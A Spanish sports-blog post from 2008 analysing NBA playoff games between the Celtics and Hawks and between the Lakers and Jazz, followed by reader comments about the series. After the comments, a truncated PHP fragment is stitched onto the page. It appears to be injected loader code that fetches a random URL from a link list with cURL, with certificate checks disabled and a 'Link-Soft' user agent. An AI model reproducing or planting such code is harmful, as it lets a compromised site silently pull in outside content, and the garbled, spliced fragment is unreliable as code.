“Big” Venganza

05 de May de 2008 por TheDeerHunter

Big” venganza del “BIG THREE” (ATL 65 – BOS 99)

Dicen que lo que no te mata te hace más fuerte. Si esto es así va a ser difícil parar a Boston Celtics tras haber logrado sobrevivir a esta batalla. No sabemos si cuando Paul Pierce amenazó al banquillo de Atlanta con aquel feo gesto pandillero ya sabía cómo iba a finalizar todo y es que para uno de los máximos candidatos al título, para el equipo campeón por antonomasia, esta serie se ha terminado convirtiendo en algo más que una simple eliminatoria. Una cuestión de orgullo. Parecía que Atlanta Hawks había logrado llevar a los Celtics al límite de su resistencia física y moral y cuando las cosas se han torcido de tal manera el llevar una camiseta como la verde puede resultar una carga más que difícil de llevar.

Anoche, los Boston Celtics, mostraron un temible carácter y se sobrepusieron a la tensión y al sufrimiento mediante la motivación que supone la venganza por todo lo que los Hawks les han hecho padecer durante esta larga serie. No era suficiente el ganar, era necesario aniquilar y humillar y en ello se emplearon con todas las fuerzas que les quedaban. Por lo visto, tampoco a Atlanta le quedaban demasiadas y en ningún momento mostraron un ápice de resistencia. En tres cuartos la defensa céltica asfixió a los Hawkas en números de récord (negativo) y únicamente cuando la ventaja rondaba los 40 puntos levantaron mínimamente el pie del acelerador.

Falta saber si tal descarga de adrenalina pasará factura al estado físico de Boston o, por el contrario, la inyección de moral que supone sobreponerse a una situación tan complicada les hace estar mejor mentalizados durante los siguientes partidos. Pronto lo vamos a comprobar.

Las orejas al lobo (UTA 98 – LAL 109)

5 victorias, 0 derrotas, actuaciones increíbles del mejor jugador del mundo son sin lugar a dudas una carta de presentación inmaculada. Los Lakers han sido campeones 6 de las 9 veces en las que empezaron así las eliminatorias por el título mientras que en otras dos fueron subcampeones y la en la última se quedaron en la final de conferencia. Sin embargo, lo que se ha venido viendo durante estos cinco partidos no ha sido precísamente algo tan rotundo como lo que se desprende de estos fríos números. Los Lakers están muy lejos de jugar bien y cuatro de las cinco victorias se han producido bajo la sospecha de ser consecuencia más por demérito del rival que del mérito propio.

Anoche, más allá de lo que indica el resultado, fue un partido complicadísimo. Kobe, como durante casi todos los playoffs, comenzó sublime, espectacular, perfecto. Sin embargo, también como en otras ocasiones, los defectos defensivos impiden que el equipo se escape en el marcador y llegado un punto se produce un momento de confusión en el juego de la estrella de LA, mostrándose inseguro, fallón e individualista y permitiendo al rival aproximarse peligrosamente en el marcador. Hasta ahora siempre se ha logrado superar ese bache con un Bryant inteligente y generoso, buscando mayoritariamente a Gasol y generando de esta forma nuevos huecos. Pero Utah no es Denver y, sin hacer un buen partido, se les pudo ver ajustar continuamente su defensa y llegar a amenazar con muchas opciones el factor cancha que tan decisivo se antoja para esta serie.

Anoche los Lakers pretendieron defender mejor de lo que lo habían hecho hasta ahora pero no lo lograron. La sangría reboteadora que les infligió Utah fue más que una llamada de atención. Si no se cierran los rebotes no hay defensa que valga. Gasol, en ese sentido, sufrió lo indecible con un Okur que le sacó de sus casillas, alejándole de la zona con la amenaza de su tiro y penetrando y cargando el rebote en cuanto tenía la ocasión. Coger un rebote se convirtió casi en una lotería para L.A. y sólo un errático partido ofensivo de los de Sloan les salvó de la derrota. El único elemento defensivo que funcionó ayer fue Dereck Fisher, que molestó muy eficazmente la dirección de Deron Williams y minimizó su aportación personal. Difícilmente se hubiera mantenido el resultado sin la aportación del ex de Utah que se benefició de lo mucho que conoce el juego de su antiguo compañero.

En cuanto al ataque, el doble-doble de Gasol no representa el flojo partido que hizo. Se le vió lento y pasivo, ralentizando la distribución en cuanto el balón llegó a sus manos y fácilmente sujeto por el par que le tocaba en suerte. Sólo puntuales acciones de pase y aciertos de última hora maquilló su actuación a unos buenos pero inmerecidos números. Parece claro que los Lakers van a tener que mejorar mucho si quieren superar el duro escollo que representa Utah, sobre todo en Salt Lake City.

Comenta

7 comentarios a esta entrada

  1. Gallis dice:
    #1

    Pues fijate que yo, será por ir siempre a contracorriente, no estoy tan preocupado por lo de anoche como la tónica general, igual que no estaba tan satisfecho con lo de Denver como lo estaba la mayoría…

    Desde luego, lo del rebote ofensivo hay que hacerselo mirar, pero vaya, imagino que Rambis, Shaw y compañia harán los ajustes necesarios. De todas formas, hay que asumir que Utah va a dominar el rebote en este serie, lo que hay que hacer es minimizar el impacto. Y oye, nos han cogido 25 rebotes ofensivos( cosa que no creo que vuelva a ocurrir) y aún así han perdido.

    Utah no es capaz de jugar mucho mejor (Deron sí, pero Utah en general no) y los Lakers ayer tampoco hicieron gran cosa. Personalmente, creo que el nivel de los 2 equipos va a subir conforme avance la serie. Los Jazz estarán más frescos y los Lakers más rodados. Desde luego vamos a sufrir, y ellos son perfectamente capaces de ganar el segundo…pero los Lakers pueden ganar en Utah claramente. A estas alturas no hay un solo partido fácil, pero vaya, no estoy emocionado con el juego de LA, pero tampoco muy preocupado.

    O lo que es lo mismo, por lo que respecta a los Lakers, los Playoffs empezaron anoche.

    Ah! no hice el pronóstico ayer en la previa…4-2, aunque si ganamos el miércoles no creo que nos ganen más de un partido. Eso sí, serán todos a cara de perro, y ahí es donde entra Kobe, jojojojo.

      Citar

  2. TheDeerHunter dice:
    #2

    El problema del análisis de un partido o eliminatoria suele ser que los defectos suelen dar más juego que las virtudes. Puede que nos quedáramos cortos con Denver porque en realidad nos dieron muy poca guerra y puede que nos pasemos con Utah y el siguiente partido sea un paseo militar.
    La cuestión es que anoche nos hicieron mucho daño en los rebotes y eso es lo que se ha reflejado.

    El problema no es tanto el número de rebotes que nos hayan cogido, que han sido muchos y como dices, aún así han perdido. El problema es una sensación de incapacidad estructural frente a ese problema por los hombres que tiene Lakers frente a los que tiene Utah.
    Okur-Boozer-Kirilenko cargando el rebote ¿cómo pueden los Lakers cerrar el rebote con un 5 tan tirador y un 3 tan versátil? Esa es la cuestión que se debe de estar haciendo Phill Jackson (y algunos de nosotros)
    Seguramente es como dices, y habrá que asumir una desventaja en el rebote.

    Lo que no estoy de acuerdo es en el enfoque del problema. Opinas que Utah no es capaz de jugar mucho mejor y yo opino que sí lo es: Boozer metió ayer sólo 15 puntos y su media es de casi 22. Perdió 7 balones y no suele perder más de 3, hizo un 42% y suele hacer un 55%… ya has mencionado a Deron Williams y el banquillo suele producir más y mejor… tienen mucho margen de mejora.
    También lo tiene Lakers en general, pero Bryant no te va a anotar 40ptos todos los partidos.

    Tampoco estoy tan seguro de que vayamos a ir tan sobrados en Salt Lake. Me da que aquello va a ser un ratonera… como lo ha sido siempre, pero este año especialmente, que vienen con ganas.

    No quiero ser agorero, pero si ya sufrí anoche y sólo era el primer partido… me da que van a haber emociones fuertes inmediatamente. De momento mantengo mi pronóstico del 4-2 intacto… espero no tener que revisarlo en los próximos días

      Citar

  3. Viva_Dirk dice:
    #3

    Yo no doy por perdido el tema del rebote, si Okur es tan exterior como es que lo defienda Odom ¿no? No veo mayo problema a eso, a Kirilenko si puede sujetarle Walto, ya que doy por hecho que Radmanovic no puede mantener la concentración para algo así.

    Y mi lectura de la crónica, aunque admito que soy un optimista empedernido, es que ambos equipos no jugaron al máximo de sus posibilidades, Utah cogió 25 rebotes ofensivos(¡¡¡¡¡25!!!!!) y aun así perdió de 10, pues resultará que somos mejores de lo que pensaba, jajaja.

      Citar

  4. Gallis dice:
    #4

    Vamos a ver. Es cierto que Boozer hizo 15 en lugar de 22, pero es que si hace 22, Okur volverá a hacer los 13 que hace normalmente, no 21. Es decir, claro que Utah va a subir el nivel, pero es que los Lakers también…lo que quiero decir cuando digo que no jugara mucho mejor es que no creo que suba el nivel mucho más que Lakers. Por supuesto que Deron y Boozer van a mejorar bastante, pero también Gasol y Odom…y Kobe seguirá siendo determinante, aunque no meta 40 puntos. Además, el banquillo de Utah subirá…y el de los Lakers??? porque ayer salvo Vujacic nada de nada…

    Y de verdad, a ver si te saco la idea de que voy de sobrado, jeje. Nadie dice que vayamos a ir sobrados en Salt Lake City. Como he dicho van a ser partidos a cara de perro, pero este equipo me parece uno de los que mejor juega fuera de casa y creo que en Utah se sufrirá mucho, pero hay muchas opciones de ganar un partido. Por eso me parece clave el segundo, y me parece que será el más difícil de todos. Si vamos a Utah con 2-0 la tropa irá con mucha moral…

    Ah! y yo tampoco quiero ser agorero, pero…ésto son Playoffs, no lo de Denver. De verdad esperabas no sufrir??? Es lo que hay, y cada partido será peor, hasta el punto de los detalles van a empezar a ser vitales. Pero créeme, ayer sufrieron más los mormones, jeje. Y si el miércoles perdemos, nos tocará a nosotros, pero no estará nada perdido, igual que ahora no hay nada ganado.

      Citar

  5. TheDeerHunter dice:
    #5

    Los mormones sólo empezarán a sufrir cuando tengan problemas en casa.
    A mí me da la sensación en que tienen completa seguridad de que van a ganar todo lo que jueguen en Salt Lake y que están agazapados para enganchar el factor cancha.

    Sólo cuando vayamos 2-0 estaré más tranquilo…. y no, preferiría no sufrir demasiado, al menos en esta serie… estoy ya mayor y ya me hace sufrir lo que me recomienda el médico el Valencia CF.

      Citar

  6. txusma dice:
    #6

    Houston les gano algun partido en casa asi q tampoco deberian estar tan seguros como comentas.

      Citar

  7. Gallis dice:
    #7

    Exacto. Ójala tengas razón y Utah esté tan confiado con su fortaleza en casa. Igual se llevan una sorpresita…o dos.

    Y yo por preferir, preferiría que nos dieran ya el anillo, pero hombre, algo habrá que sufrir para poder ganarlo, jojojojo

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>